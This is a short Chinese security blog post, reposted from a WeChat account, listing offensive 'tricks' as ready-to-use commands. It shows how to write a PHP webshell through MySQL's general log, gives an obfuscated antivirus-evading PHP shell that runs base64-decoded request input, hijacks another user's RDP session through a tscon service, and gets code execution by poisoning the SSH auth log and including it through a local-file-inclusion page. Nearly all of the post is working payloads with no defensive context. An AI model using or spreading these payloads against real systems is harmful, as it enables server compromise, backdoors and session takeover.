一些技巧

admin 2021年11月13日11:44:34评论69 views字数 988阅读3分17秒阅读模式

from:https://evi1cg.me/


 SQL语句利用日志写shell

outfile被禁止,或者写入文件被拦截;

在数据库中操作如下:(必须是root权限)

  • show variables like '%general%';  #查看配置


  • set global general_log = on;  #开启general log模式


  • set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址


  • select '<?php eval($_POST[cmd]);?>'  #写入shell

SQL查询免杀shell的语句

  1. SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"

windows切换其他登陆用户

查看用户:

  1. C:Windowssystem32>query user

  2. USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME

  3. administrator                             1  Disc            1  3/12/2017 3:07 PM

  4. >localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM


  5. C:Windowssystem32>

创建服务:

  1. C:Windowssystem32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"

  2. [SC] CreateService SUCCESS

启动服务:

  1. net setart sesshijack

LFI SSH日志

登陆SSH:

  1. ssh '<?php system($_GET[‘c’]); ?>'@192.168.1.105

包含文件:

  1. http://192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ls


本文始发于微信公众号(关注安全技术):一些技巧

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月13日11:44:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一些技巧https://cn-sec.com/archives/502001.html

发表评论

匿名网友 填写信息